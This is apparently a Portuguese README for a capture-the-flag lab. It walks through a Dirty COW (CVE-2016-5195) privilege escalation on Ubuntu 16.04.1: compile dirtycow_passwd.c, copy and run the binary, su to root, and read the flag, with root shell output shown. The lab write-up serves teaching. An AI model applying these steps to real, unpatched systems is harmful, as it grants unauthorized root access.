
Exploração da vulnerabilidade Dirty COW (CVE-2016-5195) no Ubuntu 16.04.1.
Exploração da vulnerabilidade Dirty COW (CVE-2016-5195) no Ubuntu 16.04.1.
cat > README.md <<'EOF'
Este laboratório demonstra a exploração da vulnerabilidade Dirty COW em um sistema Ubuntu Server 16.04.1 com kernel vulnerável.
O objetivo foi escalar privilégios de um usuário limitado (student) até root e capturar a flag localizada em /root/flag.txt.
Linux 4.4.0-31-generic (vulnerável).ubuntu:16.04 foi compilado dirtycow_passwd.c → binário dirty.scp dirty student@<IP>:~/.chmod +x ~/dirty && ~/dirty → su root (senha dirtyCowFun).cat /root/flag.txt → 4GEEKS{Y0u_G0t_R00t}.root@ubuntu:/home/student# whoami
root
root@ubuntu:/home/student# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/home/student# cat /root/flag.txt
4GEEKS{Y0u_G0t_R00t}
Flag obtida